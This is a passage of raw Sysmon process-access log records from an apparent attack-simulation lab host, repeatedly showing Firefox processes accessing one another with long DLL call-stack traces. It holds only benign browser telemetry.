Firefox\xul.dll+5c0f21|C:\Program Files\Mozilla Firefox\xul.dll+2e33065|C:\Program Files\Mozilla Firefox\xul.dll+2b78c3|C:\Program Files\Mozilla Firefox\xul.dll+2b6615|C:\Program Files\Mozilla Firefox\xul.dll+19b4298|C:\Program Files\Mozilla Firefox\xul.dll+568a90|C:\Program Files\Mozilla Firefox\xul.dll+504aa6|C:\Program Files\Mozilla Firefox\xul.dll+c63dd1|C:\Program Files\Mozilla Firefox\xul.dll+4bec0a|C:\Program Files\Mozilla Firefox\xul.dll+1ba5154|C:\Program Files\Mozilla Firefox\xul.dll+17c478|C:\Program Files\Mozilla Firefox\xul.dll+119394|C:\Program Files\Mozilla Firefox\xul.dll+3a76398 10341000x80000000000000005918157Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.240{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29487fc|C:\Program Files\Mozilla Firefox\xul.dll+294b972|C:\Program Files\Mozilla Firefox\xul.dll+19b4a20|C:\Program Files\Mozilla Firefox\xul.dll+19af5f7|C:\Program Files\Mozilla Firefox\xul.dll+5c139f|C:\Program Files\Mozilla Firefox\xul.dll+5c0f21|C:\Program Files\Mozilla Firefox\xul.dll+2e33065|C:\Program Files\Mozilla Firefox\xul.dll+2b78c3|C:\Program Files\Mozilla Firefox\xul.dll+2b6615|C:\Program Files\Mozilla Firefox\xul.dll+19b4298|C:\Program Files\Mozilla Firefox\xul.dll+568a90|C:\Program Files\Mozilla Firefox\xul.dll+504aa6|C:\Program Files\Mozilla Firefox\xul.dll+c63dd1|C:\Program Files\Mozilla Firefox\xul.dll+4bec0a|C:\Program Files\Mozilla Firefox\xul.dll+1ba5154 10341000x80000000000000005918156Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.240{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29487fc|C:\Program Files\Mozilla Firefox\xul.dll+294b972|C:\Program Files\Mozilla Firefox\xul.dll+19b4a20|C:\Program Files\Mozilla Firefox\xul.dll+19af5f7|C:\Program Files\Mozilla Firefox\xul.dll+5c139f|C:\Program Files\Mozilla Firefox\xul.dll+5c0f21|C:\Program Files\Mozilla Firefox\xul.dll+2e33065|C:\Program Files\Mozilla Firefox\xul.dll+2b78c3|C:\Program Files\Mozilla Firefox\xul.dll+2b6615|C:\Program Files\Mozilla Firefox\xul.dll+19b4298|C:\Program Files\Mozilla Firefox\xul.dll+568a90|C:\Program Files\Mozilla Firefox\xul.dll+504aa6|C:\Program Files\Mozilla Firefox\xul.dll+c63dd1|C:\Program Files\Mozilla Firefox\xul.dll+4bec0a|C:\Program Files\Mozilla Firefox\xul.dll+1ba5154 10341000x80000000000000005918155Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.240{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29487fc|C:\Program Files\Mozilla Firefox\xul.dll+294b972|C:\Program Files\Mozilla Firefox\xul.dll+19b4a20|C:\Program Files\Mozilla Firefox\xul.dll+19af5f7|C:\Program Files\Mozilla Firefox\xul.dll+5c139f|C:\Program Files\Mozilla Firefox\xul.dll+5c0f21|C:\Program Files\Mozilla Firefox\xul.dll+2e33065|C:\Program Files\Mozilla Firefox\xul.dll+2b78c3|C:\Program Files\Mozilla Firefox\xul.dll+2b6615|C:\Program Files\Mozilla Firefox\xul.dll+19b4298|C:\Program Files\Mozilla Firefox\xul.dll+568a90|C:\Program Files\Mozilla Firefox\xul.dll+504aa6|C:\Program Files\Mozilla Firefox\xul.dll+c63dd1|C:\Program Files\Mozilla Firefox\xul.dll+4bec0a|C:\Program Files\Mozilla Firefox\xul.dll+1ba5154 10341000x80000000000000005918154Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.240{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29487fc|C:\Program Files\Mozilla Firefox\xul.dll+294b972|C:\Program Files\Mozilla Firefox\xul.dll+19b4a20|C:\Program Files\Mozilla Firefox\xul.dll+19af5f7|C:\Program Files\Mozilla Firefox\xul.dll+5c139f|C:\Program Files\Mozilla Firefox\xul.dll+5c0f21|C:\Program Files\Mozilla Firefox\xul.dll+2e33065|C:\Program Files\Mozilla Firefox\xul.dll+2b78c3|C:\Program Files\Mozilla Firefox\xul.dll+2b6615|C:\Program Files\Mozilla Firefox\xul.dll+19b4298|C:\Program Files\Mozilla Firefox\xul.dll+568a90|C:\Program Files\Mozilla Firefox\xul.dll+504aa6|C:\Program Files\Mozilla Firefox\xul.dll+c63dd1|C:\Program Files\Mozilla Firefox\xul.dll+4bec0a|C:\Program Files\Mozilla Firefox\xul.dll+1ba5154 10341000x80000000000000005918153Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.240{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29487fc|C:\Program Files\Mozilla Firefox\xul.dll+294b972|C:\Program Files\Mozilla Firefox\xul.dll+19b4a20|C:\Program Files\Mozilla Firefox\xul.dll+19af5f7|C:\Program Files\Mozilla Firefox\xul.dll+5c139f|C:\Program Files\Mozilla Firefox\xul.dll+5c0f21|C:\Program Files\Mozilla Firefox\xul.dll+2e33065|C:\Program Files\Mozilla Firefox\xul.dll+2b78c3|C:\Program Files\Mozilla Firefox\xul.dll+2b6615|C:\Program Files\Mozilla Firefox\xul.dll+19b4298|C:\Program Files\Mozilla Firefox\xul.dll+568a90|C:\Program Files\Mozilla Firefox\xul.dll+504aa6|C:\Program Files\Mozilla Firefox\xul.dll+c63dd1|C:\Program Files\Mozilla Firefox\xul.dll+4bec0a|C:\Program Files\Mozilla Firefox\xul.dll+1ba5154 10341000x80000000000000005918152Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.240{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29487fc|C:\Program Files\Mozilla Firefox\xul.dll+294b972|C:\Program Files\Mozilla Firefox\xul.dll+19b4a20|C:\Program Files\Mozilla Firefox\xul.dll+19af5f7|C:\Program Files\Mozilla Firefox\xul.dll+5c139f|C:\Program Files\Mozilla Firefox\xul.dll+5c0f21|C:\Program Files\Mozilla Firefox\xul.dll+2e33065|C:\Program Files\Mozilla Firefox\xul.dll+2b78c3|C:\Program Files\Mozilla Firefox\xul.dll+2b6615|C:\Program Files\Mozilla Firefox\xul.dll+19b4298|C:\Program Files\Mozilla Firefox\xul.dll+568a90|C:\Program Files\Mozilla Firefox\xul.dll+504aa6|C:\Program Files\Mozilla Firefox\xul.dll+c63dd1|C:\Program Files\Mozilla Firefox\xul.dll+4bec0a|C:\Program Files\Mozilla Firefox\xul.dll+1ba5154 10341000x80000000000000005918151Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.240{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29487fc|C:\Program Files\Mozilla Firefox\xul.dll+294b972|C:\Program Files\Mozilla Firefox\xul.dll+19b4a20|C:\Program Files\Mozilla Firefox\xul.dll+19af5f7|C:\Program Files\Mozilla Firefox\xul.dll+5c139f|C:\Program Files\Mozilla Firefox\xul.dll+5c0f21|C:\Program Files\Mozilla Firefox\xul.dll+2e33065|C:\Program Files\Mozilla Firefox\xul.dll+2b78c3|C:\Program Files\Mozilla Firefox\xul.dll+2b6615|C:\Program Files\Mozilla Firefox\xul.dll+19b4298|C:\Program Files\Mozilla Firefox\xul.dll+568a90|C:\Program Files\Mozilla Firefox\xul.dll+504aa6|C:\Program Files\Mozilla Firefox\xul.dll+c63dd1|C:\Program Files\Mozilla Firefox\xul.dll+4bec0a|C:\Program Files\Mozilla Firefox\xul.dll+1ba5154 10341000x80000000000000005918150Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.239{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29487fc|C:\Program Files\Mozilla Firefox\xul.dll+294b972|C:\Program Files\Mozilla Firefox\xul.dll+19b4a20|C:\Program Files\Mozilla Firefox\xul.dll+19af5f7|C:\Program Files\Mozilla Firefox\xul.dll+5c139f|C:\Program Files\Mozilla Firefox\xul.dll+5c0f21|C:\Program Files\Mozilla Firefox\xul.dll+2e33065|C:\Program Files\Mozilla Firefox\xul.dll+2b78c3|C:\Program Files\Mozilla Firefox\xul.dll+2b6615|C:\Program Files\Mozilla Firefox\xul.dll+19b4298|C:\Program Files\Mozilla Firefox\xul.dll+568a90|C:\Program Files\Mozilla Firefox\xul.dll+504aa6|C:\Program Files\Mozilla Firefox\xul.dll+c63dd1|C:\Program Files\Mozilla Firefox\xul.dll+4bec0a|C:\Program Files\Mozilla Firefox\xul.dll+1ba5154 10341000x80000000000000005918149Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.239{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29487fc|C:\Program Files\Mozilla Firefox\xul.dll+294b972|C:\Program Files\Mozilla Firefox\xul.dll+19b4a20|C:\Program Files\Mozilla Firefox\xul.dll+19af5f7|C:\Program Files\Mozilla Firefox\xul.dll+5c139f|C:\Program Files\Mozilla Firefox\xul.dll+5c0f21|C:\Program Files\Mozilla Firefox\xul.dll+2e33065|C:\Program Files\Mozilla Firefox\xul.dll+2b78c3|C:\Program Files\Mozilla Firefox\xul.dll+2b6615|C:\Program Files\Mozilla Firefox\xul.dll+19b4298|C:\Program Files\Mozilla Firefox\xul.dll+568a90|C:\Program Files\Mozilla Firefox\xul.dll+504aa6|C:\Program Files\Mozilla Firefox\xul.dll+c63dd1|C:\Program Files\Mozilla Firefox\xul.dll+4bec0a|C:\Program Files\Mozilla Firefox\xul.dll+1ba5154 10341000x80000000000000005918148Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.239{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29487fc|C:\Program Files\Mozilla Firefox\xul.dll+294b972|C:\Program Files\Mozilla Firefox\xul.dll+19b4a20|C:\Program Files\Mozilla Firefox\xul.dll+19af5f7|C:\Program Files\Mozilla Firefox\xul.dll+5c139f|C:\Program Files\Mozilla Firefox\xul.dll+5c0f21|C:\Program Files\Mozilla Firefox\xul.dll+2e33065|C:\Program Files\Mozilla Firefox\xul.dll+2b78c3|C:\Program Files\Mozilla Firefox\xul.dll+2b6615|C:\Program Files\Mozilla Firefox\xul.dll+19b4298|C:\Program Files\Mozilla Firefox\xul.dll+568a90|C:\Program Files\Mozilla Firefox\xul.dll+504aa6|C:\Program Files\Mozilla Firefox\xul.dll+c63dd1|C:\Program Files\Mozilla Firefox\xul.dll+4bec0a|C:\Program Files\Mozilla Firefox\xul.dll+1ba5154 10341000x80000000000000005918147Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.239{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29487fc|C:\Program Files\Mozilla Firefox\xul.dll+294b972|C:\Program Files\Mozilla Firefox\xul.dll+19b4a20|C:\Program Files\Mozilla Firefox\xul.dll+19af5f7|C:\Program Files\Mozilla Firefox\xul.dll+5c139f|C:\Program Files\Mozilla Firefox\xul.dll+5c0f21|C:\Program Files\Mozilla Firefox\xul.dll+2e33065|C:\Program Files\Mozilla Firefox\xul.dll+2b78c3|C:\Program Files\Mozilla Firefox\xul.dll+2b6615|C:\Program Files\Mozilla Firefox\xul.dll+19b4298|C:\Program Files\Mozilla Firefox\xul.dll+568a90|C:\Program Files\Mozilla Firefox\xul.dll+504aa6|C:\Program Files\Mozilla Firefox\xul.dll+c63dd1|C:\Program Files\Mozilla Firefox\xul.dll+4bec0a|C:\Program Files\Mozilla Firefox\xul.dll+1ba5154 10341000x80000000000000005918146Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.239{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29487fc|C:\Program Files\Mozilla Firefox\xul.dll+294b972|C:\Program Files\Mozilla Firefox\xul.dll+19b4a20|C:\Program Files\Mozilla Firefox\xul.dll+19af5f7|C:\Program Files\Mozilla Firefox\xul.dll+5c139f|C:\Program Files\Mozilla Firefox\xul.dll+5c0f21|C:\Program Files\Mozilla Firefox\xul.dll+2e33065|C:\Program Files\Mozilla Firefox\xul.dll+2b78c3|C:\Program Files\Mozilla Firefox\xul.dll+2b6615|C:\Program Files\Mozilla Firefox\xul.dll+19b4298|C:\Program Files\Mozilla Firefox\xul.dll+568a90|C:\Program Files\Mozilla Firefox\xul.dll+504aa6|C:\Program Files\Mozilla Firefox\xul.dll+c63dd1|C:\Program Files\Mozilla Firefox\xul.dll+4bec0a|C:\Program Files\Mozilla Firefox\xul.dll+1ba5154 10341000x80000000000000005918145Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.239{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29487fc|C:\Program Files\Mozilla Firefox\xul.dll+294b972|C:\Program Files\Mozilla Firefox\xul.dll+19b4a20|C:\Program Files\Mozilla Firefox\xul.dll+19af5f7|C:\Program Files\Mozilla Firefox\xul.dll+5c139f|C:\Program Files\Mozilla Firefox\xul.dll+5c0f21|C:\Program Files\Mozilla Firefox\xul.dll+2e33065|C:\Program Files\Mozilla Firefox\xul.dll+2b78c3|C:\Program Files\Mozilla Firefox\xul.dll+2b6615|C:\Program Files\Mozilla Firefox\xul.dll+19b4298|C:\Program Files\Mozilla Firefox\xul.dll+568a90|C:\Program Files\Mozilla Firefox\xul.dll+504aa6|C:\Program Files\Mozilla Firefox\xul.dll+c63dd1|C:\Program Files\Mozilla Firefox\xul.dll+4bec0a|C:\Program Files\Mozilla Firefox\xul.dll+1ba5154 10341000x80000000000000005918144Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.239{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29487fc|C:\Program Files\Mozilla Firefox\xul.dll+294b972|C:\Program Files\Mozilla Firefox\xul.dll+19b4a20|C:\Program Files\Mozilla Firefox\xul.dll+19af5f7|C:\Program Files\Mozilla Firefox\xul.dll+5c139f|C:\Program Files\Mozilla Firefox\xul.dll+5c0f21|C:\Program Files\Mozilla Firefox\xul.dll+2e33065|C:\Program Files\Mozilla Firefox\xul.dll+2b78c3|C:\Program Files\Mozilla Firefox\xul.dll+2b6615|C:\Program Files\Mozilla Firefox\xul.dll+19b4298|C:\Program Files\Mozilla Firefox\xul.dll+568a90|C:\Program Files\Mozilla Firefox\xul.dll+504aa6|C:\Program Files\Mozilla Firefox\xul.dll+c63dd1|C:\Program Files\Mozilla Firefox\xul.dll+4bec0a|C:\Program Files\Mozilla Firefox\xul.dll+1ba5154 10341000x80000000000000005918143Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.239{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11c2808|C:\Program Files\Mozilla Firefox\xul.dll+296dbe2|C:\Program Files\Mozilla Firefox\xul.dll+2949187|C:\Program Files\Mozilla Firefox\xul.dll+29487fc|C:\Program Files\Mozilla Firefox\xul.dll+294b972|C:\Program Files\Mozilla Firefox\xul.dll+19b4a20|C:\Program Files\Mozilla Firefox\xul.dll+19af5f7|C:\Program Files\Mozilla Firefox\xul.dll+5c139f|C:\Program Files\Mozilla Firefox\xul.dll+5c0f21|C:\Program Files\Mozilla Firefox\xul.dll+2e33065|C:\Program Files\Mozilla Firefox\xul.dll+2b78c3|C:\Program Files\Mozilla Firefox\xul.dll+2b6615|C:\Program Files\Mozilla Firefox\xul.dll+19b4298|C:\Program Files\Mozilla Firefox\xul.dll+568a90|C:\Program Files\Mozilla Firefox\xul.dll+504aa6|C:\Program Files\Mozilla Firefox\xul.dll+c63dd1|C:\Program Files\Mozilla Firefox\xul.dll+4bec0a|C:\Program Files\Mozilla Firefox\xul.dll+1ba5154|C:\Program Files\Mozilla Firefox\xul.dll+17c478|C:\Program Files\Mozilla Firefox\xul.dll+119394 10341000x80000000000000005918142Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.239{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+1108cf1|C:\Program Files\Mozilla Firefox\xul.dll+29490f9|C:\Program Files\Mozilla Firefox\xul.dll+29487fc|C:\Program Files\Mozilla Firefox\xul.dll+294b972|C:\Program Files\Mozilla Firefox\xul.dll+19b4a20|C:\Program Files\Mozilla Firefox\xul.dll+19af5f7|C:\Program Files\Mozilla Firefox\xul.dll+5c139f|C:\Program Files\Mozilla Firefox\xul.dll+5c0f21|C:\Program Files\Mozilla Firefox\xul.dll+2e33065|C:\Program Files\Mozilla Firefox\xul.dll+2b78c3|C:\Program Files\Mozilla Firefox\xul.dll+2b6615|C:\Program Files\Mozilla Firefox\xul.dll+19b4298|C:\Program Files\Mozilla Firefox\xul.dll+568a90|C:\Program Files\Mozilla Firefox\xul.dll+504aa6|C:\Program Files\Mozilla Firefox\xul.dll+c63dd1|C:\Program Files\Mozilla Firefox\xul.dll+4bec0a|C:\Program Files\Mozilla Firefox\xul.dll+1ba5154|C:\Program Files\Mozilla Firefox\xul.dll+17c478|C:\Program Files\Mozilla Firefox\xul.dll+119394|C:\Program Files\Mozilla Firefox\xul.dll+3a76398|C:\Program Files\Mozilla Firefox\xul.dll+119800 10341000x80000000000000005918141Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.238{896A638B-C9AE-6058-4C07-00000000AE01}3420944C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+112c08f|C:\Program Files\Mozilla Firefox\xul.dll+c11624|C:\Program Files\Mozilla Firefox\xul.dll+202fa|C:\Program Files\Mozilla Firefox\xul.dll+1107bbf|C:\Program Files\Mozilla Firefox\xul.dll+1f6a5|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+1ebdf|C:\Program Files\Mozilla Firefox\xul.dll+11087b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918140Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 